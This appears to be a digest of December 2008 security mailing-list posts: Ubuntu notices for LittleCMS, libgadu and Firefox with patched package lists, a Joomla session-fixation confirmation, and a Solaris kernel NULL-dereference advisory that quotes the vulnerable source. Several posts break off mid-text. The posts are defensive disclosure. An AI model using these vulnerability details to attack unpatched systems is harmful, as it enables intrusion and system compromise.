=== Ubuntu Security Notice USN-693-1 December 17, 2008 LittleCMS vulnerability CVE-2008-5317 === A security issue affects the following Ubuntu releases: Ubuntu 7.10 Ubuntu 8.04 LTS Ubuntu 8.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 7.10: liblcms11.16-5ubuntu3.1 Ubuntu 8.04 LTS: liblcms11.16-7ubuntu1.1 Ubuntu 8.10: liblcms11.16-10ubuntu0.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: It was discovered that certain gamma operations in lcms were not correctly bounds-checked. If a user or automated system were tricked into processing a malicious image, a remote attacker could crash applications linked against liblcms1, leading to a denial of service, or possibly execute arbitrary code with user privileges. Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/l/lcms/lcms_1.16-5ubuntu3.1.diff.gz Size/MD5:22270 1b07d069f29de87c948d397bb60f1c63 http://security.ubuntu.com/ubuntu/pool/main/l/lcms/lcms_1.16-5ubuntu3.1.dsc Size/MD5: 1053 52d8cf3618b1d68c4d847807145ff300 http://security.ubuntu.com/ubuntu/pool/main/l/lcms/lcms_1.16.orig.tar.gz Size/MD5: 911546 b07b623f3e712373ff713fb32cf23651 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1-dev_1.16-5ubuntu3.1_amd64.deb Size/MD5: 674464 3ea01d1fb1e43a689d5aafe150702755 http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1_1.16-5ubuntu3.1_amd64.deb Size/MD5: 104172 ebeeb2d5b7dfc5df6cd759900d29f1bd http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/liblcms-utils_1.16-5ubuntu3.1_amd64.deb Size/MD5:58010 cfc5b383ff04d603270e5e129a100a35 http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/python-liblcms_1.16-5ubuntu3.1_amd64.deb Size/MD5: 160770 6ada95ac551daf18adf83eb0274eb15a i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1-dev_1.16-5ubuntu3.1_i386.deb Size/MD5: 625654 5bca706031d3f2150a08ae8d4f252b5d http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1_1.16-5ubuntu3.1_i386.deb Size/MD5:98032 520b7d9b6f4e9ad58974ea574c594640 http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/liblcms-utils_1.16-5ubuntu3.1_i386.deb Size/MD5:54488 fa816dc4c97ffc22d8200d390ccbfdc3 http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/python-liblcms_1.16-5ubuntu3.1_i386.deb Size/MD5: 151868 6a9d8575a81353384712b8b890c5d3db lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/l/lcms/liblcms1-dev_1.16-5ubuntu3.1_lpia.deb Size/MD5: 627708 35acd977e4ca7c9ba06c5a19d708f6a5 http://ports.ubuntu.com/pool/main/l/lcms/liblcms1_1.16-5ubuntu3.1_lpia.deb Size/MD5:96818 483f473b4ec36e5baa6cbd87644fb0db http://ports.ubuntu.com/pool/universe/l/lcms/liblcms-utils_1.16-5ubuntu3.1_lpia.deb Size/MD5:54790 10144bba21291ab939b0cbdcc82b39a8 http://ports.ubuntu.com/pool/universe/l/lcms/python-liblcms_1.16-5ubuntu3.1_lpia.deb Size/MD5: 148288 d638ba9bac48029ab63942b76086f9ec powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1-dev_1.16-5ubuntu3.1_powerpc.deb Size/MD5: 763170 75eb4df9ffc2343940521d61386232d8 http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1_1.16-5ubuntu3.1_powerpc.deb Size/MD5: 114370 0f56f9006b051e3f90ac255242ed55da http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/liblcms-utils_1.16-5ubuntu3.1_powerpc.deb Size/MD5:71750 313ced524c05c5b5524a43a6fe00b3b9 http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/python-liblcms_1.16-5ubuntu3.1_powerpc.deb Size/MD5: 169576 99c75e89acf4c53d2da192131832ab61 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1-dev_1.16-5ubuntu3.1_sparc.deb Size/MD5: 657440 32a668d688b45caf1b576d375067bab4 http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1_1.16-5ubuntu3.1_sparc.deb Size/MD5: 100078 272239660086573a11e9117150e990a4 http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/liblcms-utils_1.16-5ubuntu3.1_sparc.deb Size/MD5:58090 d337f0c2012f27b06923b7e3bcc151a7 http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/python-liblcms_1.16-5ubuntu3.1_sparc.deb Size/MD5: 160136 8b597e2f473e0df9a1d945f0e442940b Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubun
Re: Joomla: Session hijacking vulnerability, CVE-2008-4122
Yes, I can reproduce this behavior. The application should reinitialize the cookie after the login but instead it will keep the previous cookie. An interesting thing this is valid only for the login_module, the administrator login page does not automatically redirect to HTTPS by configuration.
[USN-692-1] Gadu vulnerability
=== Ubuntu Security Notice USN-692-1 December 17, 2008 ekg, libgadu vulnerability CVE-2008-4776 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.10 Ubuntu 8.04 LTS Ubuntu 8.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libgadu31:1.6+20051103-1ubuntu1.1 Ubuntu 7.10: libgadu31:1.7~rc2-2ubuntu0.7.10.1 Ubuntu 8.04 LTS: libgadu31:1.7~rc2-2ubuntu0.8.04.1 Ubuntu 8.10: libgadu31:1.8.0+r592-1ubuntu0.1 After a standard system upgrade you need to restart your session to effect the necessary changes. Details follow: It was discovered that the Gadu library, used by some Instant Messaging clients, did not correctly verify certain packet sizes from the server. If a user connected to a malicious server, clients using Gadu could be made to crash, leading to a denial of service. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/e/ekg/ekg_1.6+20051103-1ubuntu1.1.diff.gz Size/MD5:35354 ecdf6037647d24e67e420299f8bf3c2f http://security.ubuntu.com/ubuntu/pool/main/e/ekg/ekg_1.6+20051103-1ubuntu1.1.dsc Size/MD5: 819 b6e90f714e487383e6d0bf67e98c8957 http://security.ubuntu.com/ubuntu/pool/main/e/ekg/ekg_1.6+20051103.orig.tar.gz Size/MD5: 503834 5bea3583499a8b9989016af9221b3a07 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/e/ekg/libgadu-dev_1.6+20051103-1ubuntu1.1_amd64.deb Size/MD5: 133146 85cfd1168568f5fd6edf848fc4f91d63 http://security.ubuntu.com/ubuntu/pool/main/e/ekg/libgadu3_1.6+20051103-1ubuntu1.1_amd64.deb Size/MD5:67886 874ac814a70dfae5a61bdad164b78c76 http://security.ubuntu.com/ubuntu/pool/universe/e/ekg/ekg_1.6+20051103-1ubuntu1.1_amd64.deb Size/MD5: 293566 06f87355ed9349e215af731b968501ce i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/e/ekg/libgadu-dev_1.6+20051103-1ubuntu1.1_i386.deb Size/MD5: 127014 5fd41a5c0bce4258e6f4bb82f51eaf1c http://security.ubuntu.com/ubuntu/pool/main/e/ekg/libgadu3_1.6+20051103-1ubuntu1.1_i386.deb Size/MD5:64248 168adb89a8a875ccf6eb4302cab920a4 http://security.ubuntu.com/ubuntu/pool/universe/e/ekg/ekg_1.6+20051103-1ubuntu1.1_i386.deb Size/MD5: 273378 71859a4928ec1ce2ab8117fdda02aeeb powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/e/ekg/libgadu-dev_1.6+20051103-1ubuntu1.1_powerpc.deb Size/MD5: 134160 7b90cbde1411221e822c1952641f1379 http://security.ubuntu.com/ubuntu/pool/main/e/ekg/libgadu3_1.6+20051103-1ubuntu1.1_powerpc.deb Size/MD5:68306 a5485f32dc2d84340286d02a3161c713 http://security.ubuntu.com/ubuntu/pool/universe/e/ekg/ekg_1.6+20051103-1ubuntu1.1_powerpc.deb Size/MD5: 292000 f36a1f2c5ec9d0325532e86d0cc2150e sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/e/ekg/libgadu-dev_1.6+20051103-1ubuntu1.1_sparc.deb Size/MD5: 130728 58ffd885d139feb7b99fdffc5c59fb7b http://security.ubuntu.com/ubuntu/pool/main/e/ekg/libgadu3_1.6+20051103-1ubuntu1.1_sparc.deb Size/MD5:66288 487246f4be79c8f597ebf7bc641e3a64 http://security.ubuntu.com/ubuntu/pool/universe/e/ekg/ekg_1.6+20051103-1ubuntu1.1_sparc.deb Size/MD5: 279900 0769cb58f813ac14c05ef99073b4e940 Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/e/ekg/ekg_1.7~rc2-2ubuntu0.7.10.1.diff.gz Size/MD5:37621 2630b60a3377c5041390339f0193e38e http://security.ubuntu.com/ubuntu/pool/main/e/ekg/ekg_1.7~rc2-2ubuntu0.7.10.1.dsc Size/MD5: 898 164b0b16597df5d35869ac22e725d371 http://security.ubuntu.com/ubuntu/pool/main/e/ekg/ekg_1.7~rc2.orig.tar.gz Size/MD5: 514073 b4ea482130e163af1456699e2e6983d9 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/e/ekg/libgadu-dev_1.7~rc2-2ubuntu0.7.10.1_amd64.deb Size/MD5: 135710 0f0852a49e3b5d61ad106b50b66254b4 http://security.ubuntu.com/ubuntu/pool/main/e/ekg/libgadu3_1.7~rc2-2ubuntu0.7.10.1_amd64.deb Size/MD5:70258 8e6f4f8c9311f66513c2b44c076080d6 http://security.ubuntu.com/ubuntu/pool/universe/e/ekg/ekg_1.7~rc2-2ubuntu0.7.10.1_amd64.deb Size/MD5: 303716 c0f68dbd421b0d8d1b6412258f0910ee i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/e/ekg/libgadu-dev_1.7~rc2-2ubuntu0.7.10.1_i386.deb Size/MD5: 131008 8ea62b04f2f1e792c73cfa3c970
Firefox cross-domain text theft (CESA-2008-011)
Hi, Firefoxes 2.0.0.19 and 3.0.5 fix a cross-domain theft of textual data. The theft is via cross-domain information leaks in JavaScript error messages for scripts executed via
[TKADV2008-015] Sun Solaris SIOCGTUNPARAM IOCTL Kernel NULL pointer dereference
Please find attached a detailed advisory of the vulnerability.
Alternatively, the advisory can also be found at:
http://www.trapkit.de/advisories/TKADV2008-015.txt
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Advisory: Sun Solaris SIOCGTUNPARAM IOCTL Kernel NULL pointer
dereference
Advisory ID:TKADV2008-015
Revision: 1.0
Release Date: 2008/12/17
Last Modified: 2008/12/17
Date Reported: 2007/09/04
Author: Tobias Klein (tk at trapkit.de)
Affected Software: Solaris 10 without patch 13-01 (SPARC)
Solaris 10 without patch 138889-01 (x86)
OpenSolaris < snv_77 (SPARC)
OpenSolaris < snv_77 (x86)
Remotely Exploitable: No
Locally Exploitable:Yes
Vendor URL: http://www.sun.com
Vendor Status: Vendor has released an updated version
Patch development time: 471 days
==
Vulnerability Details:
==
The kernel of Solaris contains a vulnerability in the code that handles
SIOCGTUNPARAM IOCTL requests. Exploitation of this vulnerability can
result in:
1) local denial of service attacks (system crash due to a kernel panic), or
[ As all Solaris Zones (Containers) share the same kernel it is possible
to crash the whole system (all Zones) even if the vulnerability is
triggered in an unprivileged non-global zone. ]
2) local execution of arbitrary code at the kernel level (complete system
compromise) on x86 platforms
[ As all Solaris Zones (Containers) share the same kernel it is possible
to escape from unprivileged non-global zones and compromise other non-
global zones or the global zone. ]
The issue can be triggered by sending a specially crafted IOCTL request to
the kernel.
==
Technical Details:
==
The following source code references are based on the kernel source code
available from http://www.opensolaris.org.
http://src.opensolaris.org/source/xref/onnv/onnv-gate/usr/src/uts/common/
inet/ip/ip.c:
[...]
26692 void
26693 ip_process_ioctl(ipsq_t *ipsq, queue_t *q, mblk_t *mp, void *arg)
26694 {
[...]
26717 [1] ci.ci_ipif = NULL
[...]
26735 case TUN_CMD:
[...]
26740 [2] err = ip_extract_tunreq(q, mp, &ci.ci_ipif, ip_process_ioctl);
26741 if (err != 0) {
26742ip_ioctl_finish(q, mp, err, IPI2MODE(ipip), NULL);
26743return;
26744 }
[...]
26782 if (!(ipip->ipi_flags & IPI_WR)) {
[...]
26788 [3] err = (*ipip->ipi_func)(ci.ci_ipif, ci.ci_sin, q, mp, ipip,
26789 ci.ci_lifr);
[...]
[1] The value of "ci.ci_ipif" is set to "NULL".
[2] When a SIOCGTUNPARAM IOCTL is called the switch case "TUN_CMD" is
chosen and the "ip_extract_tunreq()" function gets called.
[3] If the return value of the "ip_extract_tunreq()" function is 0 the
"ci.ci_ipif" variable is later on used as the first parameter for the
"ip_sioctl_tunparam()" function.
http://src.opensolaris.org/source/xref/onnv/onnv-gate/usr/src/uts/common/
inet/ip/ip_if.c:
[...]
9468 int
9469 ip_sioctl_tunparam(ipif_t *ipif, sin_t *dummy_sin, queue_t *q, mblk_t
*mp,
9470 ip_ioctl_cmd_t *ipip, void *dummy_ifreq)
9471 {
...
9499 [4] ill = ipif->ipif_ill;
[...]
In the "ip_sioctl_tunparam()" function the first parameter "ipif" is used
to reference some data (see [4]).
It is possible to return from the "ip_extract_tunreq()" function (see [2])
with a return value of 0 while "ci.ci_ipif" is also still set to NULL. As
"ipif" has the same value as "ci.ci_ipif", which is set to NULL, this leads
to a NULL pointer dereference (see [4]).
On x86 (32/64bit) platforms this Null pointer dereference can be exploited
to execute arbitrary code at the kernel level. On SPARC platforms the
vulnerability can "only" be used for a denial of service.
=
Solution:
=
This issue is addressed in the following patch releases from Sun:
SPARC Platform
- Solaris 10 with patch 13-01 or later
- OpenSolaris based upon builds snv_77 or later
x86 Platform
- Solaris 10 with patch 138889-01 or later
- OpenSolaris based upon builds snv_77 or later
History:
2007/09/04 - Vendor notified
2007/09/05 - Vendor confirms the vulnerability
2008/12/17 - Public disclosure of vulnerability details by Sun
2008/12/17 - Release date of this security advisory
Credits:
Vulnerability found and advisory written by Tobias Klein.
===
References:
===
[1] http://sunsolve.sun.com/search/document.do?assetkey=1-26-242266-1
[2] http://www.trapkit.de/advisories/TKADV2008-015.txt
Changes:
Revision 0.1 - Initial draft release to the vendor
Revision 1.0 - Public release
===
Disclaimer:
===
The information within this advisory may
[USN-690-1] Firefox and xulrunner vulnerabilities
=== Ubuntu Security Notice USN-690-1 December 17, 2008 firefox-3.0, xulrunner-1.9 vulnerabilities CVE-2008-5500, CVE-2008-5501, CVE-2008-5502, CVE-2008-5505, CVE-2008-5506, CVE-2008-5507, CVE-2008-5508, CVE-2008-5510, CVE-2008-5511, CVE-2008-5512, CVE-2008-5513 === A security issue affects the following Ubuntu releases: Ubuntu 8.04 LTS Ubuntu 8.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.04 LTS: firefox-3.0 3.0.5+nobinonly-0ubuntu0.8.04.1 xulrunner-1.9 1.9.0.5+nobinonly-0ubuntu0.8.04.1 Ubuntu 8.10: abrowser3.0.5+nobinonly-0ubuntu0.8.10.1 firefox-3.0 3.0.5+nobinonly-0ubuntu0.8.10.1 xulrunner-1.9 1.9.0.5+nobinonly-0ubuntu0.8.10.1 After a standard system upgrade you need to restart Firefox and any applications that use xulrunner, such as Epiphany, to effect the necessary changes. Details follow: Several flaws were discovered in the browser engine. These problems could allow an attacker to crash the browser and possibly execute arbitrary code with user privileges. (CVE-2008-5500, CVE-2008-5501, CVE-2008-5502) It was discovered that Firefox did not properly handle persistent cookie data. If a user were tricked into opening a malicious website, an attacker could write persistent data in the user's browser and track the user across browsing sessions. (CVE-2008-5505) Marius Schilder discovered that Firefox did not properly handle redirects to an outside domain when an XMLHttpRequest was made to a same-origin resource. It's possible that sensitive information could be revealed in the XMLHttpRequest response. (CVE-2008-5506) Chris Evans discovered that Firefox did not properly protect a user's data when accessing a same-domain Javascript URL that is redirected to an unparsable Javascript off-site resource. If a user were tricked into opening a malicious website, an attacker may be able to steal a limited amount of private data. (CVE-2008-5507) Chip Salzenberg, Justin Schuh, Tom Cross, and Peter William discovered Firefox did not properly parse URLs when processing certain control characters. (CVE-2008-5508) Kojima Hajime discovered that Firefox did not properly handle an escaped null character. An attacker may be able to exploit this flaw to bypass script sanitization. (CVE-2008-5510) Several flaws were discovered in the Javascript engine. If a user were tricked into opening a malicious website, an attacker could exploit this to execute arbitrary Javascript code within the context of another website or with chrome privileges. (CVE-2008-5511, CVE-2008-5512) Flaws were discovered in the session-restore feature of Firefox. If a user were tricked into opening a malicious website, an attacker could exploit this to perform cross-site scripting attacks or execute arbitrary Javascript code with chrome privileges. (CVE-2008-5513) Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.5+nobinonly-0ubuntu0.8.04.1.diff.gz Size/MD5: 105923 f12b085d54cf9974f59417c819369f7b http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.5+nobinonly-0ubuntu0.8.04.1.dsc Size/MD5: 2073 f77df6017c984d30a3d94852d612592c http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.5+nobinonly.orig.tar.gz Size/MD5: 11578151 aab85acc009ddf9e0949f6ef8021c629 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.5+nobinonly-0ubuntu0.8.04.1.diff.gz Size/MD5:77585 714fea2e00f4d2d225419b7714617379 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.5+nobinonly-0ubuntu0.8.04.1.dsc Size/MD5: 2138 29439d2544479c7d6071b77b5392beca http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.5+nobinonly.orig.tar.gz Size/MD5: 40094530 e717d276d7d511ec448c7a308ed38ea7 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-dev_3.0.5+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5:66036 1c795fc7e998798eb93166ad6749a782 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-gnome-support_3.0.5+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5:66044 6a91da8f7b1e0f5e8bcee8290ffe8f79 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-granparadiso-dev_3.0.5+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5:66008 043213fede954207a951faa3fb3dbcef http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-trunk-dev_3.0.5+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5:65996 39449a48e9cf507448f4fe112a9f56
